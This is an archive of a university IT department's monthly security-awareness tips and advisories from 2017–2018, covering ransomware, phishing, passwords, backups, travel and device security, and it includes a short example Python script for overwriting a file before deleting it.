November 2018: Securing New Devices in an IoT World

Without a doubt, the Internet of Things makes our lives easier and has many benefits; but we can only reap these benefits if our Internet-enabled devices are secure and trusted. Here are some tips from the STOP. THINK. CONNECT. campaign and National Cyber Security Alliance to increase the security of your Internet-enabled devices:

  • Keep a clean machine. Like your smartphone or PC, keep any device that connects to the Internet free from viruses and malware. Update antivirus and anti-malware software regularly on the device itself as well as the apps you use to control the device.
  • Think twice about your device. Have a solid understanding of how a device works, the nature of its connection to the Internet, and the type of information it stores and transmits.
  • Secure your network. Properly secure the wireless network you use to connect Internet-enabled devices. Don’t forget to use a strong password and update software regularly to protect your Wi-Fi router at home.
  • Understand how to keep IoT devices up to date. This includes any software updates that might be needed and passwords or other ways of securing devices.
  • Understand what’s being collected. Most IoT devices require data collection. Take the time to understand what information your connected devices collect and how that information is managed and used.
  • Where does your data go? Many IoT devices will send information to be stored in the cloud. Understand where your data will reside and the security protecting your personal information.
  • Do your research! Before you adopt a new smart device, research it to make sure others have had positive experiences with the device from a security and privacy perspective.
Internet of Things 101. Cars, healthcare devices, appliances, wearables, lighting, and home security all contain sensing devices which allow consumers to control them remotely. In addition, these devices collect data and literally 'talk to one another'.

September 2018: Do You Have a Personal Backup Plan?

The only way to protect yourself against the loss of valuable data is through regular backups. Ideally, important files should be backed up at minimum once a week, or every day, depending on how critical they are to you. This can be done manually, automatically, or using a combination of the two methods.

When it comes to backups, just like security, you want to find a balance of being thorough but efficient. We have all heard disastrous stories of losing homework due to the blue screen of death or a misplaced cell phone that tragically stored the only copy of family photos. In addition, you could fall victim to ransomware or another malicious attack that leaves you with no choice but to reimage your computer. It never hurts to consider your backup strategy and come up with a plan that leaves you feeling safe and secure. Here are some tips to get you started.

  • Data loss happens all the time, but it is entirely preventable. You just need to create a backup plan.
  • Your critical data should never reside in a single place.
  • The ideal backup strategy will typically include both an online backup service (e.g., Dropbox, OneDrive, Google Drive, CrashPlan) and an offline backup utility (e.g., external hard drives, flash drives) to ensure your data is secure no matter what happens to your mobile device or computer. However, for University data, always keep in mind the classification, and what backup options are suitable for you.
  • Running consistent, automatic backups is a straightforward process that will take little time to set up and will require even less to maintain.
  • Backups can be configured to run in real time when files on your computer are changed.
  • Routinely test your backup solution to ensure you can recover your data in the event that you do actually need to restore from a backup.

For more information, visit here.


August 2018: Are You Ready for Ransomware?

What Is Ransomware?

Ransomware is a type of malicious software that encrypts your files. Often, the only way to decrypt and gain access to the files is by paying a “ransom” or fee to the attackers. The attackers might provide the decryption key allowing you to regain access to your files. Ransomware may spread to any shared networks or drives to which your devices are connected. We are continuing to see ransomware attacks and expect their frequency to increase.

How Can I Get Infected with Ransomware?
Common vectors for ransomware attacks include e-mails with malicious attachments or links to malicious websites. It’s also possible to get an infection through instant messaging or texts with malicious links. Antivirus may or may not detect a malicious attachment, so it’s important for you to be vigilant.

How Can I Protect Myself Against Ransomware?
There are two steps to protection against ransomware:

  • Preparation. Back up your information regularly. Once a ransomware infection occurs, it’s often too late to recover the encrypted information. Your research project or other important information may be lost permanently. For more information on backups, visit RIT’s best practices web page.
  • Identification. Ransomware typically appears as phishing e-mails, either with links to malicious websites or infected files attached. You might also see a ransomware attack perpetrated through a pop-up telling you that your computer is infected and asking you to click for a free scan. Another possible vector is malvertising, malicious advertising on an otherwise legitimate website.

Probably the Most Important Steps You Can Take to Prepare…

  • Ensure that your information is backed up regularly and properly. Because ransomware can encrypt the files on your computer and any connected drives (potentially including connected cloud drives such as Dropbox), it’s important to back up your files regularly to a location that you’re not continuously connected to. To determine the backup capabilities available to you, contact the IT Help Center.
  • Ensure that you’re able to restore files from your backups. Again, work with your IT support personnel to discuss how to test restore capabilities.
  • Ensure that antivirus/antimalware is up to date and functioning. Antivirus may detect malicious attachments.
  • Ensure that you’re keeping your system (and mobile devices) up to date with patches. If you’re prompted by your computer or mobile device to accept updates, accept them at your earliest convenience.
  • Don’t do day-to-day work using an administrator account. A successful ransomware attack will have the same permissions that you have when working. (If you’re not using an account with administrator privileges, the initial attack may be foiled.)

What Do I Do If I Think I’m Infected?

  • Report the ransomware attack to the IT Help Center.
  • Isolate or shut down the infected computer. (If you’re on Wi-Fi, turn off the Wi-Fi. If you’re plugged into the network, unplug the computer. Infected systems should be removed from the network as soon as possible to prevent ransomware from attacking network or shared drives.)

July 31st 2018: Ransom Phishing Scam

There is currently a phishing email scam being spread across many Colleges and Universities. In this email, the sender claims to have your password, and details how they have infected your computer and collected information on your personal computing use (emails, web activity, instant messages). The sender then asks for a ransom payment in the form of Bitcoin.

This is a phishing scam; do not reply.

Recommended Actions:

  • If the password stated in the email is an actual password you use, change that password immediately. It is likely that password was harvested from one of the many publicized data breaches of sites like LinkedIn and Yahoo over the years.
  • If you ever have any concerns that your computer is not behaving properly, please contact the IS&T Service Desk.
  • If you receive phishing emails, you can report them to IS&T by forwarding the email to abuse@bu.edu.

July 2018: Beef Up Your Physical Security

Employing good physical security practices does not have to include hiring a detachment of the queen’s guard for your campus (though this might be a nice attraction for prospective students!). Instead, just getting the word out to your community about the importance of a few basic physical security tips can substantially improve your institution’s security risk profile. Below are some tips to share with your community:

  • Prevent tailgating. In the physical security world, tailgating is when an unauthorized person follows someone into a restricted space. Be aware of anyone attempting to slip in behind you when entering an area with restricted access.
  • Don’t offer piggyback rides. Like tailgating, piggybacking refers to an unauthorized person attempting to gain access to a restricted area by using social engineering techniques to convince the person with access to let them in. Confront unfamiliar faces! If you’re uncomfortable confronting them, contact campus safety.
  • Put that shredder to work! Make sure to shred documents with any personal, medical, financial, or other sensitive data before throwing away. Organizing campus-wide or smaller-scale shred days can be a fun way to motivate your community to properly dispose of paper waste.
  • Be smart about recycling or disposing of old computers and mobile devices. Make sure to properly destroy your computer’s hard drive. Use the factory reset option on your mobile devices and erase or remove SIM and SD cards.
  • Lock your devices. Protecting your mobile devices and computers with a strong password or PIN provides an additional layer of protection to your data in the event of theft. Set your devices to lock after a short period of inactivity; lock your computer whenever you walk away. If possible, take your mobile devices and/or laptop with you. Don’t leave them unattended, even for a minute!
  • Lock those doors and drawers. Stepping out of the room? Make sure you lock any drawers containing sensitive information and/or devices and lock the door behind you.
  • Encrypt sensitive information. Add an additional layer of protection to your files by using the built-in encryption tools included on your computer’s operating system (e.g., BitLocker or FileVault).
  • Back up, back up, back up! Keeping only one copy of important files, especially on a location such as your computer’s hard drive, is a disaster waiting to happen. Make sure your files will still be accessible in case they’re stolen or lost by backing them up on a regular basis to multiple secure storage solutions.
  • Don’t leave sensitive data in plain sight. Keeping sensitive documents or removable storage media on your desk, passwords taped to your monitor, or other sensitive information in visible locations puts the data at risk to be stolen by those who would do you or your institution harm. Keep it securely locked in your drawer when not in use.
  • Put the laptop in your trunk. Need to leave your laptop or other device in your car? Lock it in your trunk (before arriving at your destination). Don’t invite criminals to break your car windows by leaving it on the seat.
  • Install a remote location tracking app on your mobile device and laptop. If your smartphone, tablet, or laptop is lost or stolen, applications such as Find My iPhone/iPad/Mac or Find My Device (Android) can help you to locate your devices or remotely lock and wipe them.

May 2018: Use Strong Passwords and Passphrases to Lock Down Your Login!

To help keep your BU account safe, you should never reuse your BU password for any other services. A reminder of why this is a good practice was seen last week when Twitter urged its users to change their passwords.

Twitter announced that a bug in their systems allowed for user passwords to be stored unencrypted in an internal log file. They made sure to note that, as of now, they have seen no signs of the passwords being inappropriately accessed, shared, or used. To be safe, it is strongly recommended that you not only change your Twitter password, but also change your passwords anywhere that you use that same password.

Sadly, stories of passwords being exposed online are not new. It was only a few months ago that the single largest collection of passwords was exposed on the Internet. A collection of 252 earlier breaches was aggregated into one massive database, exposing over 1.4 billion credentials.

Would you like to know if your username was included in one of the reported breaches? There are websites available to help you determine if your account was included in any known breaches, such as: https://haveibeenpwned.com/

Your passwords are the key to a host of information about you, and potentially those close to you. If someone can access your personal information, it can have serious long-term effects—and not just online! Here are some recommendations to help protect your identity while making the Internet more secure for everyone:

  • Use a passphrase instead of a password. Passphrases are usually 16 characters or more and include a combination of words or short sentence that is easy to remember (e.g., MaryHadALittleLamb!)
  • Use a fingerprint or biometric requirement to sign in when available. This provides an extra layer of protection for devices and apps.
  • Request single-use authentication codes that can be sent to your phone or delivered by an app.
  • Take advantage of whatever multifactor authentication methods are available for your service.
  • Use a password manager or password vault software to help keep track of all your passwords and avoid password reuse.

2018 Spring Cleaning Shredding Event

IS&T is happy to announce we will be hosting a “Spring Cleaning” shredding event. Similar to the event we host each October, you will be able to bring bulk amounts of paper to be shredded at the dates and locations below. Sustainability@BU will also be on hand to receive recyclable materials (batteries, toner, electronics, lightbulbs, etc.).

This is also a good opportunity to familiarize yourself with the University’s Record Retention Policy.

Do you have old University records that need shredding?  Bring them over and let us shred them for you!

The upcoming Spring Shredding Event days are currently scheduled as follows:

Visit our Information Security Homepage for more information.


April 2018: Spring Cleaning—Be Green, Not Blue

As you upgrade your personal devices to the newest options, do you recycle the old equipment? Being green shouldn’t make you blue. Take steps now to remove anxiety later that forgotten sensitive files on your last laptop could become a source of embarrassment or identity theft. Trying to securely delete data at the time you decommission equipment can turn into a multihour chore and a source of stress, but it doesn’t need to be that way.

Make sure saved copies of your tax filings, personal photos, and other sensitive files can’t be retrieved by the next person with access to your computer’s drive by making the drive unreadable to anyone else. Dragging files to the trash or recycle bin doesn’t remove data—it just removes the retrieval path to the file and marks that storage space available for other data to occupy sometime in the future. Your pirate treasure is still buried, but the map is missing. “Secure file deletion” functions go a step further to overwrite the data in those locations with random bits immediately.

The introduction and growth of solid state drives in consumer electronics, however, makes overwriting the data in these spaces less dependable than in the standard hard drives of the past. Today’s “delete/overwrite” protection comes most reliably from full disk encryption (aka whole disk encryption), which encrypts all data on the machine—including the operating system and temporary files you weren’t even aware you created. Follow the motto of a famous infomercial to “set it [full disk encryption] and forget it [the password/key]!” Even if someone removes the drive and puts it into a different machine, the encryption remains in place.

  • Full Disk Encryption: Encrypt the full disk now using built-in functionality. Create a strong passphrase or password, since this becomes the decryption key! Everything will be encrypted, including the operating system, so you will have to “unlock” the encrypted drive with your personal passphrase every time you start or boot up your computer. Save the generated recovery key somewhere secure (like a password manager or printout stored in a secure office), in case you forget your password and need to access the data on that machine. Here are instructions for some of the most common built-in encryption functions:
  • Media Destruction: Hammer time! Remove and destroy the drive (Geek Squad offers a three-minute tutorial on hard drive disposal). Most retail stores that accept computer donations for safe recycling will remove the drive and give it to you for secure destruction—just ask them to do that. Smash it, drill it, or hold onto the drive until there’s a secure shredding event at work or in your community.
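As an added illustration of the delete-versus-overwrite distinction described above (example code, not part of the original tip), the following Python contrasts dropping a file’s directory entry with overwriting its bytes first; the sample file contents and the helper names are constructed for the demo, and the caveat in the text still applies: on solid state drives an overwrite is not a dependable erasure, which is why full disk encryption is the recommended protection.

```python
# Added example, not from the original BU IS&T tip: what "secure file
# deletion" does beyond a plain delete.  os.remove() only drops the
# directory entry (the "map"); overwrite_in_place() replaces the bytes
# in the file's own blocks first.  On solid state drives the overwrite
# is NOT a dependable erasure (wear levelling can leave old blocks
# behind), which is why the tip above recommends full disk encryption.
import os
import tempfile


def overwrite_in_place(path: str, passes: int = 1) -> int:
    """Overwrite every byte of `path` with random data, in place.

    Opening with "r+b" (not "wb") keeps the existing file and writes
    over its current blocks instead of allocating new ones.
    Returns the number of bytes overwritten per pass."""
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        for _ in range(passes):
            fh.seek(0)
            remaining = size
            while remaining > 0:
                chunk = os.urandom(min(remaining, 1 << 16))
                fh.write(chunk)
                remaining -= len(chunk)
            fh.flush()
            os.fsync(fh.fileno())  # push the new bytes to the device
    return size


def secure_delete(path: str, passes: int = 1) -> int:
    """Overwrite the contents, then remove the directory entry."""
    written = overwrite_in_place(path, passes)
    os.remove(path)
    return written


def _write_sample(data: bytes) -> str:
    """Write constructed sample data to a temporary file; return its path."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Constructed walk-through: the file keeps its size after the
    overwrite, but the sensitive text is no longer in it."""
    secret = b"tax filing 2017 (constructed sample line)\n" * 64
    path = _write_sample(secret)
    size = overwrite_in_place(path, passes=2)
    with open(path, "rb") as fh:
        after = fh.read()
    os.remove(path)
    path2 = _write_sample(secret)
    written = secure_delete(path2)
    return {
        "size": size,
        "same_length": len(after) == len(secret),
        "secret_gone": b"constructed sample" not in after,
        "secure_delete_bytes": written,
        "path_gone": not os.path.exists(path2),
    }


if __name__ == "__main__":
    print(demo())
```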

March 2018: How to Protect Your Data and Devices While Traveling with Tech

Due to enhanced security measures in most countries, travelers with tech should be prepared for possible disruptions or additional wait times during the screening process. Here are some steps you can take to help secure your devices and your privacy.

Good to know:

  • While traveling within the United States, TSA agents at the gate are not allowed to confiscate your digital devices or demand your passwords.
  • Different rules apply to U.S. border patrol agents and agents in other countries. Federal border patrol agents have broad authority to search everyone entering the U.S. This includes looking through any electronic devices you have with you while you are traveling. They can seize your devices and make a copy for experts to examine offsite. Learn more from the Electronic Frontier Foundation about digital privacy at the U.S. border.

Protect your tech and data when traveling:

  • Travel only with the data that you need; look at reducing the amount of digital information that you take with you. This may mean leaving some of your devices at home, using temporary devices, removing personal data from your devices, or shifting your data to a secure cloud service. Authorities or criminals can’t search what you don’t have.
  • Most travelers will likely decide that inconvenience overrides risk and travel with electronic devices anyway. If this is the case, travelers should focus on protecting the information that they take with them. One of the best ways to do this is to use encryption. Make sure to fully encrypt your device and make a full backup of the data that you leave at home.
  • Before you arrive at the border, travelers should power off their devices. This is when the encryption services are at their strongest and will help resist a variety of high-tech attacks that may attempt to break your encryption. Travelers should not rely solely on biometric locks, which can be less secure than passwords.
  • Make sure to log out of browsers and apps that give you access to online content, and remove any saved login credentials (turn off cookies and autofill). This will prevent anyone from using your devices (without your knowledge) to access your private online information. You could also temporarily uninstall mobile apps and clear browser history so that it is not immediately apparent which online services you use.

Get your device travel ready:

  • Change your passwords or passphrases before you go. Consider using a password manager if you don’t use one already.
  • Set up multifactor authentication for your accounts whenever possible for an additional layer of security.
  • Delete apps you no longer use.
  • Update any software, including antivirus protection, to make sure you are running the most secure version available.
  • Turn off Wi-Fi and Bluetooth to avoid automatic connections.
  • Turn on “Find My [Device Name]” tracking and/or remote wiping options in case it is lost or stolen.
  • Charge your devices before you go.
  • Stay informed of TSA regulations and be sure to check with the State Department’s website for any travel alerts or warnings concerning the specific countries you plan to visit, including any tech restrictions.
  • Clear your devices of any content that may be considered illegal or questionable in other countries, and verify whether the location you are traveling to has restrictions on encrypted digital content.
  • Don’t overlook low-tech solutions:
    • Tape over the camera of your laptop or mobile device for privacy.
    • Use a privacy screen on your laptop to avoid people “shoulder surfing” for personal information.
    • Physically lock your devices and keep them on you whenever possible, or use a hotel safe.
    • Label all devices in case they get left behind!

These guidelines are not foolproof, but security experts say every additional measure taken can help reduce the chances of cybertheft.


February 2018: Learn What It Takes to Refuse the Phishing Bait!

Cybercriminals know the best strategies for gaining access to your institution’s sensitive data. In most cases, it doesn’t involve them rappelling from a ceiling’s skylight and deftly avoiding a laser detection system to hack into your servers; instead, they simply manipulate a community member. According to IBM’s 2014 Cyber Security Intelligence Index, human error is a factor in 95 percent of security incidents. Following are a few ways to identify various types of social engineering attacks and their telltale signs.

  • Phishing isn’t relegated to just e-mail! Cybercriminals will also launch phishing attacks through phone calls, text messages, or other online messaging applications. Don’t know the sender or caller? Seem too good to be true? It’s probably a phishing attack.
  • Know the signs. Does the e-mail contain a vague salutation, spelling or grammatical errors, an urgent request, and/or an offer that seems impossibly good? Click that delete button.
  • Verify the sender. Check the sender’s e-mail address to make sure it’s legitimate. If it appears that your institution’s help desk is asking you to click on a link to increase your mailbox quota, but the sender is “UniversityHelpDesk@yahoo.com,” it’s a phishing message.
  • Don’t be duped by aesthetics. Phishing e-mails often contain convincing logos, links to actual company websites, legitimate phone numbers, and e-mail signatures of actual employees. However, if the message is urging you to take action — especially action such as sending sensitive information, clicking on a link, or downloading an attachment — exercise caution and look for other telltale signs of phishing attacks. Don’t hesitate to contact the company directly; they can verify legitimacy and may not even be aware that their name is being used for fraud.
  • Never, ever share your password. Did we say never? Yup, we mean never. Your password is the key to your identity, your data, and your classmates’ and colleagues’ data. It is for your eyes only. Your institution’s help desk or IT department will never ask you for your password.
  • Avoid opening links and attachments from unknown senders. Get into the habit of typing known URLs into your browser. Don’t open attachments unless you’re expecting a file from someone. Give them a call if you’re suspicious.
  • When you’re not sure, call to verify. Let’s say you receive an e-mail claiming to be from someone you know — a friend, colleague, or even the president of your college or university. Cybercriminals often spoof addresses to convince you, then request that you perform an action such as transfer funds or provide sensitive information. If something seems off about the e-mail, call them at a known number listed in your institution’s directory to confirm the request.
  • Don’t talk to strangers! Receive a call from someone you don’t know? Are they asking you to provide information or making odd requests? Hang up the phone and report it to the help desk.
  • Don’t be tempted by abandoned flash drives. Cybercriminals may leave flash drives lying around for victims to pick up and insert, thereby unknowingly installing malware on their computers. You might be tempted to insert a flash drive only to find out the rightful owner, but be wary — it could be a trap.
  • See someone suspicious? Say something. If you notice someone suspicious walking around or “tailgating” someone else, especially in an off-limits area, call campus safety.

January 2018: Keep What’s Private, Private

You exist in digital form all over the Internet. It is thus important to ensure that the digital you matches what you are intending to share. It is also critical to guard your privacy — not only to avoid embarrassment, but also to protect your identity and finances!

Following are specific steps you can take to protect your online information, identity, and privacy.

  • Use a unique password for each site. Hackers often use previously compromised information to access other sites. Choosing unique passwords keeps that risk to a minimum.
  • Use a password manager. Using an encrypted password manager to store your passwords makes it easy to access and use a unique password for each site.
  • Know what you are sharing. Check the privacy settings on all of your social media accounts; some even include a wizard to walk you through the settings. Always be cautious about what you post publicly.
  • Guard your date of birth and telephone number. These are key pieces of information used for verification, and you should not share them publicly. If an online service or site asks you to share this critical information, consider whether it is important enough to warrant it.
  • Keep your work and personal presences separate. Your employer has the right to access your e-mail account, so you should use an outside service for private e-mails. This also helps you ensure uninterrupted access to your private e-mail and other services if you switch employers.
  • There are no true secrets online. Use the postcard or billboard test: Would you be comfortable with everyone reading a message or post? If not, don’t share it.

December 2017: Your Mobile Devices Won’t Secure Themselves!

Mobile security at one time meant using a laptop lock and keeping tabs on your phone. However, the growing capabilities and use of mobile devices — coupled with the ubiquity of smart devices stitched into the very fabric of our daily lives (figuratively and literally) — now require a more sophisticated defense-in-depth approach to match the growing threat. Following are a few things you can do to protect your devices and personal information on campus, at home, or at work.

  • Secure your devices with a strong password, pattern, or biometric authentication. Check the settings for each device to enable a screen-lock option. For home routers, reset the default password with a strong one.
  • Install anti-malware. Some software includes features that let you do automatic backups and track your device.
  • Check your Bluetooth and GPS access. Disable these settings on all devices when not needed and avoid using them in public areas.
  • Update your devices often. Install operating system and application updates when they become available.
  • Review phone apps regularly. Remove any apps you don’t use. Be selective when buying or installing new apps. Install only those from trusted sources and avoid any that ask for unnecessary access to your personal information.
  • Treat devices like cash! Don’t let your devices out of your sight or grasp. Maintain physical control of your device in public areas. Get a lock (alarmed is best) for your laptop and use it.
  • Keep it sunny in the cloud. Whether using Google Drive, Dropbox, OneDrive, iCloud, Amazon Drive, or any of the many cloud options, set privacy restrictions on your files to share them only with those you intend. Protect access to your cloud drive with two-factor authentication.
  • Create a secure wireless network. Configure your wireless router to protect your bandwidth, identifiable information, and personal computer. Secure it with proper set up and placement, router configuration, and a unique password, using the strongest encryption option.
  • Protect your Internet of Things (IoT) devices. Are you sharing your livestreaming nanny cam with the world? Review privacy settings for all Internet-ready devices before connecting them to the web.

November 29th 2017: Mac OS 10.13 (High Sierra) Vulnerability

A security flaw has been detected in Mac Operating Systems 10.13 (High Sierra) or greater. This vulnerability allows anyone to log in to a Mac device and gain full administrative access by typing in the username “root” with no password. More details can be found in the links provided below.

Systems at Risk

  • Currently, this vulnerability is only found in Macs running an Operating System that has been upgraded to MacOS 10.13 (High Sierra) or greater, and
  • Systems that can be directly physically accessed, or have Apple Remote Desktop (ARD) enabled.

Recommended Actions

Additional Information:

Homeland Security Vulnerability Note

MacRumors - Major macOS High Sierra Bug Allows Full Admin Access Without Password – How to Fix


November 2017: Securing Mobile Devices

Mobile devices have become one of the primary ways we communicate and interact with each other. The power of a computer is now at our fingertips, allowing us to bank, shop, view medical history, attend to work remotely, and communicate virtually anywhere. With all these convenient features come added risks, but here are some tips to protect your devices and your personal information.

  • Password-protect your devices. Give yourself more time to protect your data and remote wipe your device if it’s lost or stolen by enabling passwords, PINs, fingerprint scans, or other forms of authentication.
  • Secure those devices and back up data! Make sure that you can remotely lock or wipe each mobile device. That also means backing up data on each device in case you need to use the remote wipe function.
  • Verify app permissions. Don’t forget to review an app’s specifications and privacy permissions before installing it!
  • Update operating systems. Security fixes or patches for mobile devices’ operating systems are often included in these updates.
  • Be cautious of public Wi-Fi hot spots. Avoid financial or other sensitive transactions while connected to public Wi-Fi hot spots.

October 17th 2017: Vulnerability Discovered in Wi-Fi Security Standard

You may have heard by now that a vulnerability in the WPA2 wireless security standard has been discovered. WPA2 is a current industry standard that secures a wireless network by adding authentication and data encryption.

What does this mean?

The vulnerability recently discovered puts the WPA2 protocol at risk of being bypassed – if exploited, the communications over your wireless network could be exposed, or potentially manipulated. This would put your data, such as passwords, credit card and banking information, at risk.

What do I need to do?

While this is a serious vulnerability, it is worth noting that to exploit this, the attacker would need to be physically close to your computer. It is recommended that you still follow these basic precautions:

  • Still use WiFi security! Even with a vulnerability, it’s better than not using it at all.
  • Make sure you are using secure websites (https) when entering in any kind of sensitive information. Any connections to a secure website (https) or through a VPN will still be secure, as this layer of encryption would not be affected.
  • As always, if you’re using a public Wi-Fi connection, use a VPN and/or don’t conduct any sensitive business from that public connection.
  • Security updates and patches are already rolling out to address this flaw; it is always advised to keep your computing equipment up to date. Information on how to configure your computers, tablets and phones for automatic updates can be found here. Any wireless access points you use at home should also be updated. A source to check on the status of various vendors’ updates can be found here.

IS&T is currently in the process of ensuring all of our affected equipment is patched for this vulnerability.

If you want to read more on the WPA2 Vulnerability, you can read more here.


September 8th 2017: Equifax Data Breach – What Happened and What it Means

What Happened?

On September 7, 2017, Equifax CEO Rick Smith announced that Equifax had suffered a data breach between May and July 2017. The breach may have included the personal credit information of 143 million Americans, including social security numbers, birthdates, addresses, driver’s license numbers and credit account information.

What does this mean?

If a malicious hacker were to get your personal information, they could sell it, or use it to impersonate you.  They could open credit accounts in your name, and use them for illegal means.  In the event of any breach, it is normally suggested that you review and monitor your records to make sure there are no unauthorized accounts or charges on existing accounts, and no signs of suspicious activity.

Also, be careful with any suspicious emails that claim to have information about the Equifax breach.  Don’t click on links or download attachments from these emails, as hackers will often capitalize on the news of highly publicized breaches and send phishing e-mails asking consumers to provide sensitive information or visit malicious sites.

More detail of this event can be found here:

https://www.nytimes.com/2017/09/07/business/equifax-cyberattack.html


September 2017: Avoiding Ransomware Attacks

Ransomware is a type of malware designed to encrypt users’ files or lock their operating systems so attackers can demand a ransom payment. According to a 2016 Symantec report the average ransom demand is almost $700 and “consumers are the most likely victims of ransomware, accounting for 57 percent of all infections between January 2015 and April 2016.”

Similar to a phishing attack, ransomware runs when a user is lured into clicking an infected link or e-mail attachment, or into downloading a file or software while visiting a rogue website. Sophisticated social engineering techniques are used to entice users to take the desired action; examples include

  • an embedded malicious link in an e-mail offers a cheap airfare ticket (see figure 1);
  • an e-mail that appears to be from Google Chrome or Facebook invites recipients to click on an image to update their web browser (see figure 2); or
  • a well-crafted website mimics a legitimate website and prompts users to download a file or install an update that locks their PC or laptop.

To avoid becoming a victim of ransomware, users can follow these tips:

  • Delete any suspicious e-mail. Messages from unverified sources or from known sources that offer deals that sound too good to be true are most likely malicious (see figure 3). If in doubt, contact the alleged source by phone or by using a known, public e-mail address to verify the message’s authenticity.
  • Avoid clicking on unverified e-mail links or attachments. Suspicious links might carry ransomware (such as the CryptoLocker Trojan).
  • Use e-mail filtering options whenever possible. E-mail or spam filtering can stop a malicious message from reaching your inbox.
  • Install and maintain up-to-date antivirus software. Keeping your antivirus software updated with the latest virus definitions helps ensure that it can detect the latest malware variations. Definition updates do not replace operating system and application patches, which close the holes the malware uses to get in.
  • Update all devices, software, and plug-ins on a regular basis. Check for operating system, software, and plug-in updates often — or, if possible, set up automatic updates — to minimize the likelihood of someone holding your computer or files for ransom.
  • Back up your files. Back up the files on your computer, laptop, or mobile devices frequently so you don’t have to pay the ransom to access locked files. Keep at least one copy disconnected from your computer (an unplugged external drive, or a cloud service that keeps previous versions), because ransomware also encrypts any attached drive or network share it can reach.

August 16th 2017: Duo For Mainframe

We are making changes to the way you log in to UIS Mainframe/GALAXY on August 29. Beginning the morning of Sunday, October 1st you will no longer need your SecurID token (the little fob with a number that changes frequently) to log in to UIS using a terminal screen, often called Host On-Demand (HOD), 3270, or Reflections. You will first need to connect to the two-factor VPN, which requires Duo (you probably already use Duo for BUworks). After connecting to the two-factor VPN, you can connect to the UIS Mainframe/GALAXY and will only be prompted to enter your user ID and password.

We have prepared a Frequently Asked Questions page to address some of the more commonly asked questions. Although you will no longer need your SecurID token, please hold onto them for now, as they will be collected in the near future.

We apologize for any inconvenience caused by this change. If you have any questions about this change, or require assistance, please email ithelp@bu.edu.


August 2017: Are You Practicing Safe Social Networking?

Who Else Is Online? Social media sites are not well-monitored playgrounds with protectors watching over you to ensure your safety. When you use social media, do you think about who might be using it besides your friends and connections? Following are some of the other users you may encounter.

  • Identity thieves. Cybercriminals need only a few pieces of information to gain access to your financial resources. Phone numbers, addresses, names, and other personal information can be harvested easily from social networking sites and used for identity theft. Cybercrime attacks have moved to social media, because that’s where cybercriminals get their greatest return on investment.
  • Online predators. Are your friends interested in seeing your class schedule online? Well, sex offenders or other criminals could be as well. Knowing your schedule and your whereabouts can make it very easy for someone to victimize you, whether it’s breaking in while you’re gone or attacking you while you’re out.
  • Employers. Most employers investigate applicants and current employees through social networking sites and/or search engines. What you post online could put you in a negative light to prospective or current employers, especially if your profile picture features you doing something questionable or “less than clever.” Think before you post a compromising picture or inflammatory status. (And stay out of online political and religious discussions!)

How Do I Protect My Information? Although there are no guaranteed ways to keep your online information secure, following are some tips to help keep your private information private.

  • Don’t post personal or private information online! The easiest way to keep your information private is to NOT post it. Don’t post your full birthdate, address, or phone numbers online. Don’t hesitate to ask friends to remove embarrassing or sensitive information about you from their posts, either. You can NEVER assume the information you post online is private.
  • Use privacy settings. Most social networking sites provide settings that let you restrict public access to your profile, such as allowing only your friends to view it. (Of course, this works only if you allow people you actually know to see your postings — if you have 10,000 “friends,” your privacy won’t be very well protected.)
  • Review privacy settings regularly. It’s important to review your privacy settings for each social networking site; they change over time, and you may find that you’ve unknowingly exposed information you intended to keep private.
  • Be wary of others. Many social networking sites do not have a rigorous process to verify the identity of their users. Always be cautious when dealing with unfamiliar people online. Also, you might receive a friend request from someone masquerading as a friend. Here’s a cool hint — if you use Google Chrome, right-click on the photo in a LinkedIn profile and choose Google image search. If you find that there are multiple accounts using the same image, all but one is probably spurious.
  • Search for yourself. Do you know what information is readily available about you online? Find out what other people can easily access by doing a search. Also, set up an automatic search alert to notify you when your name appears online. (You may want to set alerts for your nicknames, phone numbers, and addresses as well; you may very well be surprised at what you find.)
  • Understand the role of hashtags. Hashtags (#) are a popular way to provide clever commentary or to tag specific pictures. Many people restrict access to their Instagram accounts so that only their friends can see their pictures. However, when someone applies a hashtag to a picture that is otherwise private, anyone who searches for that hashtag can see it.

My Information Won’t Be Available Forever, Will It? Well, maybe not forever, but it will remain online for a lot longer than you think.

  • Before posting anything online, remember the maxim “what happens on the web, stays on the web.” Information on the Internet is public and available for anyone to see, and security is never perfect. With browser caching and server backups, there is a good chance that what you post will circulate on the web for years to come. So: be safe and think twice about anything you post online.
  • Share only the information you are comfortable sharing. Don’t supply information that’s not required. Remember: You have to play a role in protecting your information and staying safe online. No one will do it for you.

July 2017: Think You’ve Been Hacked? Here’s How to Shake It Off!

Face it: Hackers Gonna Hack. How to know if you’ve been hacked?

  • Your friends tell you. They’ve received a spammy or phishy e-mail from your account.
  • Your phone tells you. Collection companies are calling about nonpayment. Battery and data usage are higher than normal. Charges for premium SMS numbers show up on your bill.
  • Your browser tells you. Unwanted browser toolbars, homepages, or plugins appear unexpectedly. You’re seeing lots of pop-ups or web page redirects. Your online passwords aren’t working.
  • Your software tells you. New accounts appear on your device. Antivirus messages report that the virus hasn’t been cleaned or quarantined. You see fake antivirus messages from software you don’t remember installing. Programs are running or requesting elevated privileges that you did not install. Programs randomly crash.
  • Your bank tells you. You receive a message about insufficient funds due to unauthorized charges.
  • Your mail tells you. You receive a notification from a company that has recently suffered a cybersecurity breach.

Shake it off. Following are the steps you can take to recover.

  1. Change your affected passwords using an unaffected device. Not sure which passwords are affected? It’s best to change them all.
  2. Update your mobile software and apps. Make sure you keep them up-to-date.
  3. Update your antivirus software. Then run a complete scan. Follow the instructions provided to quarantine or delete any infected files.
  4. Update your browser software and plugins. Check frequently for new updates and delete any unnecessary or obsolete plugins.
  5. Is your computer still acting wonky? It might be best to start from scratch with a complete reformat of your machine so you can ensure that all affected software is fixed.
  6. Self-report to credit agencies. If you believe your personally identifiable information has been affected, you don’t want to deal with identity theft on top of being hacked.
  7. Be prepared with backups. Don’t let the next compromise ruin your day. Backup your files frequently. Consider storing at least two separate backups: one on an external drive and one in cloud storage.
  8. Stay ahead of the hackers. Check the Have I been pwned website to see if your accounts were hacked in a known attack.

June 2017: Basic Steps to Online Safety and Security

Follow these six National Cyber Security Alliance recommendations to better protect yourself online and make the Internet more secure for everyone:

  • Fortify each online account or device. Enable the strongest authentication tools available. This might include biometrics, security keys, or unique one-time codes sent to your mobile device. Usernames and passwords are not enough to protect key accounts such as e-mail, banking, and social media.
